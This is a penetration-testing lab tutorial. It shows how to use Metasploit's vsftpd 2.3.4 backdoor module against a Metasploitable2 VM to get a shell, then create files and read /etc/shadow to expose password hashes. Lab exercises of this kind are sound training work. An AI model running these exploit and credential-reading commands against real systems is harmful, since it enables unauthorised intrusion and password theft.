Introduction to Metasploit Framework
The Metasploit Framework is a powerful, open-source platform used by cybersecurity professionals for penetration testing, exploit development, and vulnerability research. It provides a massive database of known exploits, payloads, encoders, and post-exploitation tools, allowing Red Teamers to simulate real-world attacks against target networks.

3. Prerequisites

    Attacker Machine: Kali Linux VM

    Target Machine: Metasploitable2 VM

    Ensure both virtual machines are up and running and can communicate over the local network.

4. Step-by-Step Exploitation Process

Phase 1: Initialization and Setup

    Open the Kali Linux terminal.

    Note: If the Metasploit-framework is more than two weeks old, run the update command to get the latest framework modules:
    sudo msfupdate (or sudo apt update && sudo apt install metasploit-framework on newer Kali builds).

Phase 2: Launching Metasploit and Exploiting the Target
Enter the following commands sequentially in the terminal to exploit a known vulnerability (e.g., the vsftpd 2.3.4 backdoor commonly found on Metasploitable2):

    msfconsole (Launches the Metasploit Framework interactive shell).

    search vsftpd (Searches the database for exploits related to the vulnerable FTP service).

    use exploit/unix/ftp/vsftpd_234_backdoor (Selects the specific exploit module to use).

    set RHOSTS <Target_IP> (Sets the target machine's IP address, e.g., 192.168.62.129).

    show options (Verifies that all required parameters, like RHOSTS and Port, are set correctly).

    exploit (Executes the attack against the target machine).

    Result: It will successfully open a command shell directly into the target IP (Metasploitable2 VM).

Phase 3: Post-Exploitation (Demonstrating Impact)
Once the shell is established, execute the following commands to demonstrate file manipulation and data exfiltration:

    Create a file with some contents:
    echo "Red Team network compromise successful" > redteam_proof.txt

    Copy the file to another new file:
    cp redteam_proof.txt copied_proof.txt

    Now go to the Metasploitable2 VM console directly (or use cat in the shell) and check the same file contents to verify they were created remotely:
    cat copied_proof.txt

    Demonstrate access to highly sensitive details (like password hashes):
    cat /etc/shadow
    (This proves that the exploit granted root-level privileges, allowing the attacker to access critical system files).

5. Database Commands for Connection & Status
Metasploit includes a built-in PostgreSQL database to track hosts, services, and vulnerabilities discovered during an assessment. These commands are used within the msf> prompt to interact with the connected database:

    db_status: Checks the connection status to the current database (confirms if Metasploit is properly connected to PostgreSQL).

    db_connect <username:password@host:port/database>: Manually connects to a specific database if the default connection is down.

    db_disconnect: Disconnects from the current data service.
